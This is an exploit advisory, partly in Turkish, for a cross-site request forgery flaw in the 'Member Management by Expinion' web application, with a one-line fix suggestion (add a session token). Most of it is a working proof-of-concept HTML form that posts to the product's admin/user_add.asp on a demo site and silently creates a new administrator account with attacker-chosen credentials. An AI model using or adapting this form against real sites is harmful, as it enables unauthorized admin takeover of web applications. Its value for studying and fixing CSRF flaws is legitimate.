< ------------------- header data start ------------------- >

#############################################################

# Application Name :Member Management by Expinion

# vulnerable Type : xsrf

# Infection : Yeni Bir Admin Eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://www.europeum.net/Demos/MMS/admin/user_add.asp method=post name=frm onSubmit=return ValidateUser()>
<input style=width: 350; type=Text name=name value= size=40 maxlength=95 class=textbox />
<input style=width: 350; type=Text name=company value= size=40 maxlength=85 class=textbox />
<input style=width: 350; type=Text name=email value= size=40 maxlength=75 class=textbox />
<input style=width: 290; type=Text name=username value= size=30 maxlength=25 class=textbox />
<input style=width: 290; type=Text name=password value= size=30 maxlength=25 class=textbox />
<input style=’width: 350px;’ type=’Text’ value=’Admin can add custom fields like this one, the checkbox below, or the My Form field.’ name=’1’ class=’textbox’>
<input style=’’ type=’Checkbox’ value=’I agree to the terms and conditions.’ name=’4’ class=’’>
<input style=width: 100%; type=Text name=units value=0 size=40 maxlength=5 class=textbox />
<input type=Checkbox name=active checked value=1 /> <img src= images/caution.gif>

< -- bug code end of -- >